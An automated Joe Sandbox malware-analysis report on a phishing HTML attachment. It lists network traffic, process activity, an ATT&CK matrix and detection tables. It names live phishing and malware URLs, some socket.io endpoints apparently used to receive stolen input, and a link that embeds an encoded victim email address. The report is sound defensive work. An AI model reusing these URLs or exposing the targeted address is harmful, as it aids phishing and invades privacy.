            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49758 version: TLS 1.2
            Source: classification engineClassification label: mal80.phis.winHTML@15/46@30/15
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#U25b6#Ufe0fVmail__00_15.html
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1956,i,15275357982726791337,180945757907666501,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1956,i,15275357982726791337,180945757907666501,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=100%SlashNextCredential Stealing type: Phishing & Social Engineering
            https://kwiktestaust.com/o/jsv.js0%Avira URL Cloudsafe
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NA6B100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N4dY100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8Ms_L100%Avira URL Cloudmalware
            https://kwiktestaust.com/favicon.ico0%Avira URL Cloudsafe
            https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==0%Avira URL Cloudsafe
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MyYE100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N50m&sid=YouvQDKT6G9okB_XAAB8100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YouvQDKT6G9okB_XAAB8100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=BbP6iaRyNQn3rw9FAAB_100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8Mnmw100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YmxoENE2iMzP-htfAAB5100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5100%Avira URL Cloudmalware
            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0016.t-0009.t-msedge.net
            13.107.246.44
            truefalse
              high
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                kwiktestaust.com
                188.114.97.3
                truefalse
                  high
                  d2vgu95hoyrpkh.cloudfront.net
                  18.245.31.5
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      high
                      cs837.wac.edgecastcdn.net
                      192.229.133.221
                      truefalse
                        high
                        s-part-0036.t-0009.t-msedge.net
                        13.107.246.64
                        truefalse
                          high
                          sni1gl.wpc.omegacdn.net
                          152.199.21.175
                          truefalse
                            high
                            s-part-0017.t-0009.t-msedge.net
                            13.107.246.45
                            truefalse
                              high
                              www.google.com
                              142.250.186.100
                              truefalse
                                high
                                grastoonm3vides.com
                                188.114.97.3
                                truefalse
                                  high
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    high
                                    www.w3schools.com
                                    unknown
                                    unknownfalse
                                      high
                                      cdn.socket.io
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://kwiktestaust.com/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://kwiktestaust.com/o/jsv.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssfalse
                                          high
                                          https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==#YWthc2guZGVzYWlAbGNhdHRlcnRvbi5jb20=true
                                          • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                          unknown
                                          https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MyYEfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.w3schools.com/w3css/4/w3.cssfalse
                                            high
                                            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N4dYfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YouvQDKT6G9okB_XAAB8false
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8Ms_Lfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.jsfalse
                                              high
                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2false
                                                high
                                                https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                                  high
                                                  https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQV&sid=YmxoENE2iMzP-htfAAB5false
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8N50m&sid=YouvQDKT6G9okB_XAAB8false
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NA6Bfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=BbP6iaRyNQn3rw9FAAB_false
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2false
                                                    high
                                                    https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8MzQU&sid=YmxoENE2iMzP-htfAAB5false
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                                      high
                                                      https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8NArj&sid=BbP6iaRyNQn3rw9FAAB_false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://grastoonm3vides.com/socket.io/?EIO=4&transport=websocket&sid=YmxoENE2iMzP-htfAAB5false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://a.nel.cloudflare.com/report/v4?s=4K%2FvrXSO2xQ0Acbwl7I5oAiTM%2B35l%2BK0gWATVQY5RxXwkZk5Hi7S0NQmjM0E9u0nbhQe7mmepxl52XA0JWh5N%2FOAUGiaFvbZomoEaBZ0tgF4iqx%2B%2FEy1oKde446ul2%2B%2FWIfN8tUzfalse
                                                        high
                                                        https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PC8Mnmwfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://fontawesome.com/license/freechromecache_70.2.drfalse
                                                          high
                                                          https://fontawesome.comchromecache_70.2.drfalse
                                                            high
                                                            https://i.imgur.com/xA8aaXN.pngchromecache_83.2.dr, chromecache_91.2.drfalse
                                                              high
                                                              https://google.comchromecache_89.2.dr, chromecache_94.2.drfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.17.24.14
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                13.107.246.64
                                                                s-part-0036.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                13.107.246.45
                                                                s-part-0017.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                13.107.246.44
                                                                s-part-0016.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                192.229.133.221
                                                                cs837.wac.edgecastcdn.netUnited States
                                                                15133EDGECASTUSfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                188.114.97.3
                                                                kwiktestaust.comEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                18.245.31.5
                                                                d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                16509AMAZON-02USfalse
                                                                13.227.219.40
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                188.114.96.3
                                                                unknownEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                152.199.21.175
                                                                sni1gl.wpc.omegacdn.netUnited States
                                                                15133EDGECASTUSfalse
                                                                142.250.186.100
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.25.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                IP
                                                                192.168.2.16
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1551571
                                                                Start date and time:2024-11-07 21:39:24 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 4m 18s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:13
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:#U25b6#Ufe0fVmail__00_15.html
                                                                renamed because original name is a hash value
                                                                Original Sample Name:Vmail__00_15.html
                                                                Detection:MAL
                                                                Classification:mal80.phis.winHTML@15/46@30/15
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .html
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.186.142, 173.194.76.84, 34.104.35.123, 142.250.184.195, 172.217.18.106, 142.250.186.170, 216.58.206.42, 142.250.184.202, 216.58.206.74, 172.217.16.202, 142.250.186.106, 142.250.185.106, 142.250.184.234, 172.217.18.10, 142.250.186.138, 142.250.181.234, 216.58.212.170, 142.250.185.74, 142.250.186.42, 142.250.185.234, 142.250.181.227, 142.250.186.99, 142.250.74.206
                                                                • Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: #U25b6#Ufe0fVmail__00_15.html
                                                                No simulations
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                                                http://vtaurl.comGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                                                http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                                                • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                                                13.107.246.64https://api.inspectrealestate.com.au/email/track?eta=1&t=B32-5UARLGTXC6GHXC7PJPHCGUP7HMF6FJEQ76L6MOL7WYB6P6EYQNBONANBBGKOXFRO3HPDET5TXGOZXG5FJNMJJC437YUYUWDF5VEVIWPK6LECEZJV3OMRCXF6VI76ZOGYOFIOERVACTHYB4KHK22IKKEWLYPTUBLONXLA7QVY2SW2TZMW4ULVG2UAKDR3DM3RL4TTJAF3F3ROXQ3ZLRVYS7Z2T4TIQETEEUV73V42AQLF65YKSUX6JMYEW3ZHXPREAMXXBOQV32GKOYOISFZKX4GPTPR2IMSMCULLR2V4QUSMU3MWF7NQ%3D%3D%3D%3DGet hashmaliciousUnknownBrowse
                                                                • www.inspectrealestate.com.au/
                                                                13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                • nam.dcv.ms/BxPVLH2cz4
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
